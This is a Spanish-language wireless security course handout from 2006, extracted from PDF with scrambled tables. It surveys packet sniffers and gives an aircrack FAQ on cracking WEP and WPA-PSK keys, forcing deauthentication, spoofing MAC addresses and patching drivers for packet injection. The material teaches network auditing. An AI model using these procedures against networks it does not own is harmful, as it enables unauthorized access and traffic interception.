Tcpdump es un herramienta en línea de comandos cuya utilidad principal es analizar el
tráfico que circula por la red. Puede aprovechar el modo promiscuo para así poder analizar paquetes
que inicialmente no están destinados a nuestra maquina.
Para poder analizar mejor los datos que aparecen en pantalla podemos usar numerosos filtros un
ejemplo para ver solo el trafico que tiene la dirección ip 172.26.0.3 por el puerto 80 seria algo así:
BASH# tcpdump -i wlan0 -v tcp port 80 and host 172.26.0.3
20
seguridad-21_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Ethereal (http://www.ethereal.com/)
Esta herramienta se usa para analizar tráfico en redes, generalmente podremos dividir los
distintos protocolos así como añadir filtros para ver lo que nos interese en cada momento.
Los filtros del Ethereal son similares a los de Tcpdump, un ejemplo para ver el tráfico en la ip
192.168.0.3 podría ser de esta manera, introduciendo en el menú de filtros la siguiente expresión.
tcp port 23 and host 192.168.1.3
21
seguridad-22_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Detección de IP y de intrusos
Ettercap (http://ettercap.sourceforge.net/)
Ettercap es una herramienta de software libre para para el uso de análisis de protocolos de red y
comprobación de seguridad en estas. Puede ser utilizado para interceptar tráfico en un segmento de
la red, para capturar contraseñas, y para conducir ataques man-in-the-middle contra un número de
protocolos comunes.
Ettercap ofrece un gran número de opciones para generar filtros y para poder envenenar una red sin
mayor problema.
22
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Netdiscover (http://nixgeneration.com/~jaime/netdiscover/)
Este escaner, comprueba todos los rangos posibles para detectar el rango o rangos de red.
Sin necesidad de tener el interfaz de red en una ip determinada comprueba activamente todos los
rangos, también podemos escanear en pasivo para no hacer demasiado “ruido” en la red.
Para un scan rápido de los rangos mas frecuentes usamos la siguiente expresión:
BASH# netdiscover -i wlan0 -m auto -f
5. C
omprometiendo la seguridad en Redes Inalámbricas (WEP)
· Uso de la herramienta AIRCRACK y sus distintas funcionalidades.
¿Qué es aircrack ?
aircrack es una colección de herramientas para la auditoría de redes inalámbricas:
· airodump: programa para la captura de paquetes 802.11
· aireplay: programa para la inyección de paquetes 802.11
· aircrack: crackeador de claves estáticas WEP y WPA-PSK
· airdecap: desencripta archivos de capturas WEP/WPA
¿Hay un foro de discusión?
Claro: http://100h.org/forums/. Mira también #aircrack en irc.freenode.net
23
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
¿Dónde puedo descargar aircrack ?
La descarga oficial se encuentra en http://www.cr0.net:8040/code/network/. De
cualquier modo, si por cualquier motivo no tienes acceso al puerto 8040, puedes usar
también este mirror: http://100h.org/wlan/aircrack/.
Aircrack está incluido en el Troppix LiveCD, que incluye los controladores { Prism2 /
PrismGT / Realtek / Atheros / Ralink } parcheados para la inyección de paquetes, así
como los controladores acx100 e ipw2200 (Centrino b/g) .
Recibo el mensaje “cygwin1.dll not found” cuando inicio aircrack.exe.
Puedes descargar esta librería de:http://100h.org/wlan/aircrack/.
Para usar aircrack, arrastra el/los archivo(s) de captura .cap o .ivs sobre aircrack.exe. Si
quieres pasarle opciones al programa deberás abrir una consola de comandos (cmd.exe)
e introducirlas manualmente; también hay una GUI para aircrack, desarrollada por
hexanium.
C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap
Más abajo encontrarás una lista de opciones.
¿Cómo crackeo una clave WEP estática ?
La idea básica es capturar tanto tráfico encriptado como sea posible usando airodump.
Cada paquete de datos WEP tiene asociado un Vector de Inicialización (IV) de 3-bytes:
después de recoger un número suficiente de paquetes de datos, ejecuta aircrack sobre el
archivo de captura resultante. Entonces aircrack ejecutará un conjunto de ataques de
tipo estadístico desarrollados por un talentoso hacker llamado KoreK.
¿ Cómo sé si mi clave WEP es la correcta ?
Hay dos modos de autenticación WEP:
· Open-System Authentication: Este es el predeterminado El AP acepta todos los
clientes, y nunca comprueba la clave: siempre concede la asociación . De todas
formas, si tu clave es incorrecta no podrás recibir o enviar paquetes (porque
fallará la desencriptación), y por tanto DHCP, ping, etc. acabarán
interrumpiéndose.
· Shared-Key Authentication: el cliente debe encriptar la petición antes de que le
sea concedida la asociación por el AP. Este modo tiene fallas y provoca la
recuperación de la clave, por lo que nunca está activado de modo
predeterminado.
En resumen, sólo por que parezca que te conectas de forma satisfactoria al AP ¡no
significa que tu clave WEP sea la correcta! Para comprobar tu clave WEP, procura
24
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
desencriptar un archivo de captura con el programa airdecap.
¿Cuántos IVs se necesitan para crackear WEP ?
El crackeo WEP no es una ciencia exacta. El número de IVs necesarios depende de la
longitud de la clave WEP, y también de la suerte. Normalmente, una clave WEP de 40-
bit puede ser crackeada con 300.000 IVs, y una de 104-bit con 1.000.000 de IVs;
teniendo mala suerte se pueden necesitar dos millones de IVs, o más.
No hay ninguna manera de saber la longitud de la clave WEP: esta información está
oculta y nunca es anunciada, guardada bien en paquetes de gestión, bien en paquetes de
datos; como consecuencia, airodump no puede reportar la longitud de la clave WEP. Por
ese motivo, se recomienda ejecutar aircrack dos veces: cuando tienes 250.000 IVs,
inicias aircrack con “-n 64″ para crackear la WEP de 40-bit. Si no la sacas, vuelves a
iniciar aircrack (sin la opción -n) para crackear la WEP de 104-bit.
¡Parece que no consigo IVs !
Posibles motivos:
· Te encuentras demasiado lejos del punto de acceso.
· No hay tráfico en la red escogida.
· Hay tráfico de tipo G pero estás capturando en modo B.
· Hay algún problema con tu tarjeta (¿problema de firmware ?)
Los beacons sólo son “paquetes anuncio” sin encriptar. No sirven para el
crackeo WEP.
¡No he podido crackear este AP !
Shit happens.
¿Por qué no hay una versión de aireplay para Windows ?
El controlador PEEK no soporta la inyección de paquetes 802.11; No portaré aireplay a
Win32. De todos modos, hay alternativas comerciales:
Tarjetas Prism: http://www.tuca-software.com/transmit.php
Tarjetas Atheros: http://www.tamos.com/htmlhelp/commwifi/pgen.htm
¿Es compatible mi tarjeta con airodump / aireplay ?
Antes de nada, busca en Google para averiguar cuál es el chipset de tu tarjeta. Por
25
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
ejemplo, si tienes una Linksys WPC54G busca por “wpc54g chipset linux”.
Soportado por
Soportado por airodump
Soportado por
Chipset
airodump en
en Linux ?
aireplay en Linux ?
Windows ?
SÍ (Controlador
SÍ (Controlador orinoco
NO (el firmware
HermesI
Agere)
parcheado)
corrompe la cabecera
de la MAC)
NO, puedes buscar SÍ (controlador HostAP o
SÍ (PCI y CardBus
Prism2/3
en LinkFerret una
wlan-ng ), firmware STA
sólo, se recomienda
alternativa
1.5.6 o más nuevo
parchear el
necesario
controlador)
SÍ (Controlador
FullMAC: SÍ (controlador SÍ (se recomienda
PrismGT
PrismGT)
prism54, SoftMAC: AÚN parchear el
NO (prism54usb)
controlador)
CardBus: Sí
(Controlador
Sí (PCI y CardBus sólo,
SÍ (es necesario
Atheros
Atheros), PCI: NO controlador madwifi)
parchear el
(mira CommView
controlador)
WiFien su lugar)
SÍ (controlador
SÍ (rtl8180-sa2400
INESTABLE (es
RTL8180
Realtek)
controlador)
necesario parchear el
controlador)
¿SÍ? (controlador
SÍ (controlador airo, se
NO (problemas de
Aironet
Cisco)
recomienda la versión
firmware)
4.25.30 del firmware)
SÍ (controlador rt2500 /
SÍ (es necesario
Ralink
NO
rt2570)
parchear el
controlador)
PARCIAL: el controlador
Centrino b
NO
ipw2100 no descarta los
NO
paquetes corruptos
SÍ (controlador ipw2200, se NO (el firmware
Centrino b/g
NO
recomienda la versión
desecha paquetes)
1.0.6)
Sólo los modelos
NO PROBADO
Broadcom
antiguos
(controlador bcm43xx,
NO
(Controlador
necesario Linux >= 2.6.14)
BRCM)
TI (ACX100 /
NO
ALFA (controlador
NO
ACX111)
acx100)
ZyDAS 1201
NO
AÚN NO (Controlador
NO
zd1211)
26
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Atmel, Marvel
NO
DESCONOCIDO
NO
El controlador PEEK no reconoce mi tarjeta.
Los controladores de Windows arriba mencionados no reconocen algunas tarjetas,
incluso teniendo el chipset correcto. En este caso, abre el administrador de dispositivos,
selecciona tu tarjeta, “Actualizar el controlador”, selecciona “Instalar desde una
ubicación conocida”, selecciona “No buscar, seleccionaré el controlador a instalar”, haz
click en “Utilizar disco”, introduce la ruta donde ha sido descomprimido el archivo,
deselecciona “Mostrar hardware compatible”, y elige el controlador.
Tengo una tarjeta Prism2, ¡ pero airodump / aireplay parece no funcionar !
Primer paso, asegúrate de que no estás usando el controlador orinoco. Si el nombre de
interfaz es wlan0, entonces el controlador es HostAP o wlan-ng. Si el nombre de la
interfaz es eth0 o eth1, entonces el controlador es orinoco y debes deshabilitarlo (usa
cardctl para averiguar el identificador de tu tarjeta, entonces edita /etc/pcmcia/config,
reemplaza orinoco_cs por hostap_cs y reinicia cardmgr).
También puede ser un problema de firmware. Los firmwares antiguos presentan
problemas con el test mode 0×0A (usado por los parches para la inyección con HostAP /
wlan-ng), por tanto asegúrate de que el tuyo está al día — mira las instrucciones más
abajo. La versión recomendada de firmware para la estación es la 1.7.4. Si no funciona
bien (kismet o airodump estallan tras capturar un par de paquetes), prueba con la STA
1.5.6 (o bien s1010506.hex para las tarjetas Prism2 más antiguas, o sf010506.hex para
las más nuevas).
Como nota aclaratoria, test mode 0×0A es algo inestable con wlan-ng. Si la tarjeta
parece atrancarse, tendrás que resetearla, o usar HostAP en su lugar. La inyección sobre
dispositivos USB Prism2 está actualmente rota con wlan-ng.
Nota: Aquí pueden encontrar un controlador para Prism2 bajo Windows XP para
tarjetas con soporte para WPA/TKIP :
http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe.
Tengo una tarjeta Atheros, y el parche madwifi provoca un fallo en el kernel /
aireplay dice: enhanced RTC support isn’t available.
Hay algunos problemas con algunas versiones de la rama 2.6 de Linux (especialmente
anteriores al 2.6.11) que provocarán un kernel panic al inyectar con madwifi. También,
en muchos kernels 2.6 el soporte para RTC mejorado está simplemente roto. Por tanto,
está altamente recomendado utilizar un Linux 2.6.11.x o más nuevo.
¿ Cómo actualizo el firmware de mi Prism2 ?
La forma más simple es actualizar mediante WinUpdate – para esto es necesario tener
instalado el controlador WPC11 v2.5. Ambos se pueden obtener de:
http://100h.org/wlan/linux/prism2/.
27
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
También se puede actualizar el firmware con el HostAP parcheado (mira más abajo las
instrucciones sobre cómo parchear e instalar HostAP). Alternativamente, puedes
arrancar el Troppix Live CD (el cuál contiene un controlador hostap ya parcheado y la
utilidad prism2_srec).
Ahora que el HostAP está cargado, puedes comprobar el firmware de tu primario y de la
estación con este comando:
# dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0×800c v1.0.0
wifi0: PRI: id=0×15 v1.1.1 (primary firmware is 1.1.1)
wifi0: STA: id=0×1f v1.7.4 (station firmware is 1.7.4)
wifi0: registered netdevice wlan0
Si el id de NIC se encuentra entre 0×8002 y 0×8008, en ese caso tienes una
Prism2 antigua y DEBES usar firmware STA en su versión 1.5.6
(s1010506.hex). De lo contrario, deberías usar PRI 1.1.1 / STA 1.7.4 que es
la versión de firmware más estable para las tarjetas Prism2 más nuevas. NO
uses firmware 1.7.1 o 1.8.x, la gente ha reportado problemas usándolos.
Para actualizar el firmware, necesitarás prism2_srec del paquete hostap-
utils; si no se encuentra ya en el sistema, descarga y compila hostap-utils:
wget http://100h.org/wlan/linux/prism2/hostap-utils-
0.4.0.tar.gz
tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make
Algunas tarjetas Prism2 han sido restringidas a un cierto conjunto de canales
debido a regulaciones nacionales.Puedes activar los 14 canales con los
siguientes comandos:
./prism2_srec wlan0 -D > pda; cp pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)
Por último, descarga el firmware y flashea tu tarjeta. Si el id de NIC está
entre 0×8002 y 0×8008:
wget http://100h.org/wlan/linux/prism2/s1010506.hex
./prism2_srec -v -f wlan0 s1010506.hex -P pda
De lo contrario:
wget http://100h.org/wlan/linux/prism2/pk010101.hex
wget http://100h.org/wlan/linux/prism2/sf010704.hex
./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda
Si recibes el mensaje “ioctl[PRISM2_IOCTL_HOSTAPD]:
Operation not supported”, el controlador HostAP no está cargado
y debes instalarlo. Si recibes el mensaje
28
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
“ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not
supported”, entonces tu controlador HostAP no ha sido parcheado para
soportar la descarga no-volátil.
¿ Qué tarjeta comprar ?
El mejor chipset a día de hoy es Atheros; está muy bien soportado por ambos Windows
y Linux. El último parche madwifi hace posible inyectar en bruto paquetes 802.11 tanto
en modo Infraestructura (Managed) como Monitor a velocidades b/g.
Ralink hace buenos chipsets, y ha sido muy cooperativo con la comunidad open-source
para desarrollar controladores GPL. Ahora la inyección de paquetes está completamente
soportada bajo Linux con tarjetas PCI/PCMCIA RT2500, y también funciona en
dispositivos USB RT2570.
Aquí hay una lista de tarjetas recomendadas:
Soporte en Soporte
Card name
Type
Chipset Antenna Precio
Windows
en
Linux
MSI
PCI
Ralink
RP-SMA E30
No
Sí
PC54G2
MSI
CardBus Ralink
Interna
E30
No
Sí
CB54G2
Linksys
WMP54G PCI
Ralink
RP-SMA E40
No
Sí
v4
Linksys
WUSB54G USB
Ralink
Interna
E40
No
Sí
v4
D-Link
DWL-
USB
Ralink
Interna
E45
No
Sí
G122
Netgear
USB
PrismGT Interna E40
airodump
No
WG111
SoftMAC
Netgear
PCI
Atheros
RP-SMA E50
CommView Sí
WG311T
WiFi
Netgear
CardBus Atheros
Interna
E50
airodump
Sí
WG511T
Netgear
CardBus Atheros
Interna
E100
airodump
Sí
WAG511
Proxim
CardBus Atheros
MC +
E110
airodump
Sí
8470-WD
Int.
29
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Nota: hay algunos modelos más baratos con nombre parecido (WG511, WG311, DWL-
650+ y DWL-G520+); esas tarjetas no están basadas en Atheros . Además, el
controlador Peek no soporta las tarjetas Atheros recientes, por lo que deberás usar
CommView WiFi en su lugar.
¿ Cómo uso airodump en Windows ?
Antes de nada, asegúrate de que tu tarjeta es compatible (mira la tabla de más arriba) y
de que tienes instalado el controlador adecuado. También debes descargar peek.dll y
peek5.sys y ponerlos en el mismo directorio que airodump.exe.
A la hora de ejecutar airodump, deberías especificar:
· El número identificador de la interfaz de red, que debe ser elegido de la lista
mostrada por airodump.
· El tipo de interfaz de red (’o’ para HermesI y Realtek, ‘a’ para Aironet y Atheros).
· El número de canal, entre 1 y 14. También puedes especificar 0 para alternar
entre todos los canales.
· El prefijo de salida. Por ejemplo, si el prefijo es “foo”, entonces airodump creará
foo.cap (paquetes capturados) y foo.txt (estadísticas CSV). Si foo.cap existe,
airodump continuará la captura añadiéndole los paquetes.
· La opción “sólo IVs”. Debe ser 1 si solamente quieres guardar los IVs de los
paquetes de datos WEP. Esto ahorra espacio, pero el archivo resultante (foo.ivs)
sólo será útil para el crackeo WEP.
Para parar de capturar paquetes presiona Ctrl-C. Puede que te salga una pantalla azul,
debido a un bug en el controlador PEEK por no salir limpiamente de modo monitor.
También puede que el archivo resultante de la captura está vacío. La causa de este bug
es desconocida.
¿ Por qué no puedo compilar airodump y aireplay en BSD / Mac OS X ?
Ambas fuentes, de airodump y aireplay son específicas de linux. No hay planes de
portarlas a otros sistemas operativos.
¿ Cómo uso airodump en Linux ?
Antes de ejecutar airodump, debes iniciar el script airmon.sh para listar las interfaces
inalámbricas detectadas.
30 Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
uso: airodump [canal] [opción IVs]
Especifica 0 como canal para oscilar entre los canales de la
banda de los 2.4 GHz.
Pasa la opción de los IVs a 1 para guardar sólo los IVs
capturados – el archivo
resultante sólo vale para el crackeo WEP.
Si el demonio gpsd se encuentra funcionando, airodump
recogerá y guardará las
coordenadas GPS en formato de texto.
Puedes convertir un archivo .cap / .dump a formato .ivs con el programa
pcap2ivs (linux sólo).
Airodump oscila entre WEP y WPA.
Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen
CRC inválido). Si es un Centrino b, simplemente no tiene arreglo; ve y compra una
tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.
¿ Cuál es el significado de los campos mostrados por airodump ?
airodump mostrará una lista con los puntos de acceso detectados, y también
una lista de clientes conectados o estaciones (”stations”). Aquí hay un
ejemplo de una captura de pantalla usando una tarjeta Prism2 con HostAP:
BSSID PWR Beacons # Data CH MB ENC ESSID
00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR
BSSID STATION PWR Packets Probes
00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid
Field
Description
BSSID
Dirección MAC del punto de acceso.
Nivel de señal reportado por la tarjeta. Su significado depende del
PWR
controlador, pero conforme te acercas al punto de acceso o a la estación la
señal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel
de señal.
Número de paquetes-anuncio enviados por el AP. Cada punto de acceso
Beacons
envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo
que normalmente pueden ser recogidos desde muy lejos.
# Data
Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs),
incluyendo paquetes de datos de difusión general.
CH
Número de canal (obtenido de los paquetes beacon). Nota: algunas veces
31
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
se capturan paquetes de datos de otros canales aunque no se esté
alternando entre canales debido a las interferencias de radiofrecuencia.
Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de
MB
802.11b, si MB = 22 entonces es 802.11b+ y velocidades mayores son
802.11g.
Algoritmo de encriptación en uso. OPN = sin encriptación, “WEP?” =
WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA),
ENC
WEP (sin la interrogación) indica WEP estática o dinámica, y WPA si
TKIP o CCMP están presentes.
Conocida como “SSID”, puede estar vacía si el ocultamiento de SSID está
ESSID
activo. En este caso airodump tratará de recuperar el SSID de las
respuestas a escaneos y las peticiones de asociación.
Dirección MAC de cada estación asociada. En la captura de más arriba se
STATION
han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).
¿ Cómo uno dos archivos de captura ?
Puedes usar el programa mergecap (parte del paquete ethereal-common o
la distribución win32):
mergecap -w out.cap test1.cap test2.cap test3.cap
Se puede unir archivos .ivs con el programa “mergeivs” (linux sólo).
¿ Puedo usar Ethereal para capturar paquetes 802.11 ?
Bajo Linux, simplemente prepara la tarjeta para modo Monitor con el script
airmon.sh. Bajo Windows, Ethereal NO PUEDE capturar paquetes
802.11 .
¿Puede Ethereal decodificar paquetes de datos WEP ?
Sí. Ve a Editar -> Preferencias -> Protocolos -> IEEE 802.11, selecciona 1 en la “WEP
key count” e introduce tu clave WEP debajo.
¿ Cómo cambio mi dirección MAC?
Esta operación solamente es posible bajo Linux. Por ejemplo, si tienes una
tarjeta Atheros:
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
Si no funciona, intenta sacar y re-insertar la tarjeta.
¿ Cómo uso aircrack ?
32
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Usage: aircrack [options]
Puedes especificar múltiples archivos de entrada (tanto en formato .cap
como .ivs). También puedes ejecutar airodump y aircrack al mismo tiempo:
aircrack se auto-actualizará cuando haya nuevos IVs disponibles.
Aquí hay un sumario con todas las opciones disponibles:
Opción
Param.
Descripción
-a
amode
Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA-PSK).
Si se especifica, se usarán todos los IVs de las redes con el mismo
-e
essid
ESSID. Esta opción es necesaria en el caso de que el ESSID no
esté abiertamente difundido en un crackeo WPA-PSK (ESSID
oculto).
-b
bssid
Selecciona la red elegida basándose en la dirección MAC.
-p
nbcpu
En sistemas SMP , especifica con esta opción el número de CPUs.
-q
none
Activa el modo silencioso (no muestra el estado hasta que la clave
es o no encontrada).
-c
none
(crackeo WEP) Limita la búsqueda a caracteres alfanuméricos
solamente (0×20 – 0×7F).
-d
start
(crackeo WEP) Especifica el comienzo de la clave WEP (en hex),
usado para depuración.
(crackeo WEP) Dirección MAC para la que filtrar los paquetes de
-m
maddr
datos WEP. Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para
usar todos y cada uno de los IVs, indiferentemente de la red que
sea.
(crackeo WEP) Especifica la longitud de la clave: 64 para WEP
-n
nbits
de 40-bit , 128 para WEP de 104-bit , etc. El valor
predeterminado es 128.
(crackeo WEP) Conserva sólo los IVs que tienen este índice de
-i
index
clave (1 a 4). El comportamiento predeterminado es ignorar el
índice de la clave.
(crackeo WEP) De forma predeterminada, este parámetro está
establecido en 2 para WEP de 104-bit y en 5 para WEP de 40-bit.
-f
fudge
Especifica un valor más alto para elevar el nivel de fuerza bruta:
el crackeo llevará más tiempo, pero con una mayor posibilidad de
éxito.
(crackeo WEP) Hay 17 ataques de tipo estadístico de korek. A
veces un ataque crea un enorme falso positivo que evita que se
-k
korek
obtenga la clave, incluso con grandes cantidades de IVs. Prueba
-k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques de
forma selectiva.
-x
none
(crackeo WEP) No aplicar fuerza bruta sobre los dos últimos
33
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
keybytes.
(crackeo WEP) Éste es un ataque de fuerza bruta experimental
-y
none
único que debería ser usado cuando el método normal de ataque
falle con más de un millón de IVs.
-w
words
(WPA cracking) Ruta hacia la lista de palabras.
¿ Podrías implementar una opción para reanudar en aircrack ?
No hay planes de implementar esta capacidad.
¿ Cómo puedo crackear un red WPA-PSK ?
Debes capturar hasta que se produzca un “saludo” (handshake) entre un cliente
inalámbrico y el punto de acceso. Para forzar al cliente a reautenticarse puedes iniciar
un ataque de deautenticación con aireplay. También es necesario un buen diccionario;
ver
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
Para tu información. No es posible pre-computar grandes tablas de Pairwise Master
Keys como hace rainbowcrack, puesto que la contraseña está entremezclada con el
ESSID.
¿ Será crackeado WPA en el futuro ?
Es extremadamente improbable que WPA sea crackeado del modo que lo ha sido WEP.
El mayor problema de WEP es que la clave compartida está adjunta en el IV; el
resultado está vinculado directamente con el RC4. Esta construcción simple superpuesta
es propensa a un estaque de tipo estadístico, ya que los primeros bytes del texto cifrado
están fuertemente correspondidos con la clave compartida (ver el papel de Andrew
Roos). Existen básicamente dos contramedidas a este ataque: 1. mezclar el IV y la clave
compartida usando una función para la codificación o 2. descartar los primeros 256
bytes de la salida del RC4.
Ha habido alguna desinformación en las noticias acerca de las fallas de TKIP:
Por ahora, TKIP es razonablemente seguro por sí solo viviendo
un tiempo prestado ya que se apoya en el mismo algoritmo RC4
en el que se apoyó WEP.
Realmente, TKIP (WPA1) no es vulnerable: para cada paquete, el IV de 48-
bit está mezclado con la clave temporal pairwise de 128-bit para crear una
clave RC4 de 104-bit, por lo que no hay ninguna correlación de tipo
estadístico . Es más, WPA proporciona contramedidas ante ataques activos
(reinyección de tráfico), incluye un mensaje de integridad de código más
fuerte (michael), y tiene un protocolo de autenticación muy robusto
(”saludo” de 4 fases). La única vulnerabilidad a tener en cuenta es el ataque
34
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
con diccionario, que falla si la contraseña es lo suficientemente robusta.
WPA2 (aka 802.11i) es exactamente lo mismo que WPA1, excepto que usa
CCMP (////AES in counter mode////) en lugar de RC4 y HMAC-SHA1 en
lugar de HMAC-MD5 para el EAPOL MIC. Como apunte final, WPA2 es
un poco mejor que WPA1, pero ninguno de los dos será crackeado en un
futuro cercano.
¡ Tengo más de un millón de IVs, pero aircrack no encuentra la clave !
Posibles motivos:
· Mala suerte: necesitas capturar más IVs. normalmente, una WEP de
104-bit puede ser crackeada con aproximadamente un millón de IVs,
aunque a veces se necesitan más IVs.· Si todos los votos (votes) parecen iguales, o si hay muchos votos
negativos, entonces el archivo con la captura está corrupto, o la clave
no es estática (¿se está usando EAP/802.1X ?).· Un falso positivo evitó que se obtuviera la clave. Prueba a desactivar
cada ataque korek (-k 1 .. 17), sube el nivel de fuerza bruta (-f) o
prueba con el ataque inverso experimental único (-y).
He encontrado una clave, ¿cómo desencripto un archivo de captura ?
Puedes usa el programa airdecap :
uso: airdecap [opciones]
-l : no elimina la cabecera del 802.11
-b bssid : filtro de dirección MAC del punto de acceso
-k pmk : WPA Pairwise Master Key en hex
-e essid : Identificador en ascii de la red escogida
-p pass : contraseña WPA de la red escogida
-w key : clave WEP de la red escogida en hex
ejemplos:
airdecap -b 00:09:5B:10:BC:5A open-network.cap
airdecap -w 11A3E229084349BC25D97E2939 wep.cap
airdecap -e “el ssid” -p contraseña tkip.cap
¿ Cómo recupero mi clave WEP en Windows ?
Puedes usar el programa WZCOOK que recupera las claves WEP de la utilidad de XP
Wireless Zero Configuration. Éste es un software experimental, por lo que puede que
funcione y puede que no, dependiendo del nivel de service pack que tengas.
35
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
¿Recupera WZCOOK también claves WPA ?
WZCOOK mostrará el PMK (Pairwise Master Key), un valor de 256-bit que es el
resultado de codificar 8192 veces la contraseña junto con el ESSID y la longitud del
ESSID. La contraseña en sí no se puede recuperar — de todos modos, basta con conocer
el PMK para conectar con una red inalámbrica protegida mediante WPA con
wpa_supplicant (ver el Windows README). Tu archivo de configuración
wpa_supplicant.conf debería quedar así:
network={
ssid=”mi_essid”
pmk=5c9597f3c8245907ea71a89d[…]9d39d08e
}
¿ Cómo parcheo el controlador para la inyección con aireplay ?
Hasta ahora, aireplay sólo soporta la inyección con Prism2, PrismGT
(FullMAC), Atheros, RTL8180 y Ralink. La inyección con Centrino,
Hermes, ACX1xx, Aironet, ZyDAS, Marvell y Broadcom no está
soportada debido a limitaciones en firmware y/o controlador.
La inyección con Prism2 y Atheros es aún bastante experimental; si tu
tarjeta parece colgarse (sin paquetes capturados o inyectados), desactiva la
interfaz, vuelve a cargar los controladores y reinserta la tarjeta. Considera
también actualizar el firmware (si es Prism2).
Todos los controladores deben ser parcheados para de ese modo soportar la
inyección en modo Monitor. Necesitarás las cabeceras linux (linux headers)
que coincidan con el kernel que estés usando; si no, tendrás que descargar
las fuentes de linux y compilar un kernel personalizado.
Si tienes problemas en lo referido a parcheado y compilación, puede que
quieras usar el Troppix LiveCD, el cuál incluye controladores parcheados
para los dispositivos.
· Instalando el controlador madwifi (Tarjetas Atheros)
Nota 1: necesitarás uudecode del paquete sharutils.
Nota 2: el parche 20051008 debería funcionar también con versiones
más recientes del CVS de madwifi.
Nota 3: si usas wpa_supplicant, deberías recompilarlo (las versiones
antiguas no son compatibles con el CVS actual de madwifi), y
asegurarte de que CONFIG_DRIVER_MADWIFI=y no está
comentado en config.h.
Nota 4: con el madwifi actual, ya no será necesario ejecutar
36
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
“iwpriv ath0 mode 2″, ya que el controlador permite la
inyección en modo 0 usando la nueva interfaz athXraw.
Modos Permitidos
Medio Físico
Modo 0
Automático (a/b/g)
Modo 1
802.11a sólo
Modo 2
802.11b sólo
Modo 3
802.11g sólo
ifconfig ath0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe \
ath_pci wlan ath_hal 2>/dev/null
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
2>/dev/null
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
2>/dev/null
cd /usr/src
wget http://100h.org/wlan/linux/atheros/madwifi-cvs-
20051025.tgz
wget http://100h.org/wlan/linux/patches/madwifi-cvs-
20051025.patch
tar -xvzf madwifi-cvs-20051025.tgz
cd madwifi-cvs-20051025
patch -Np1 -i ../madwifi-cvs-20051025.patch
make KERNELPATH=/usr/src/linux-
make install
modprobe ath_pci
Ahora es posible establecer el ritmo de transmisión (rate) con
madwifi (y también con rt2570). El valor recomendado es 5.5 Mbps,
pero puedes reducirlo o incrementarlo en función de la distancia a la
que se encuentre el AP. Por ejemplo:
iwconfig ath0 rate 24M
Modulado
Velocidades Permitidas
DSSS / CCK 1M, 2M, 5.5M, 11M
OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M
Durante los ataques 2, 3 y 4, cambiar el número de paquetes por
segundo enviados por aireplay (opción -x) a veces ayuda a obtener
mejores resultados; el predeterminado es 500 pps.
· Instalación del controlador prism54 (tarjetas PrismGT FullMAC)
37
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
ifconfig eth1 down
rmmod prism54
cd /usr/src
wget http://100h.org/wlan/linux/prismgt/prism54-svn-
20050724.tgz
wget http://100h.org/wlan/linux/patches/prism54-svn-
20050724.patch
tar -xvzf prism54-svn-20050724.tgz
cd prism54-svn-20050724
patch -Np1 -i ../prism54-svn-20050724.patch
make modules && make install
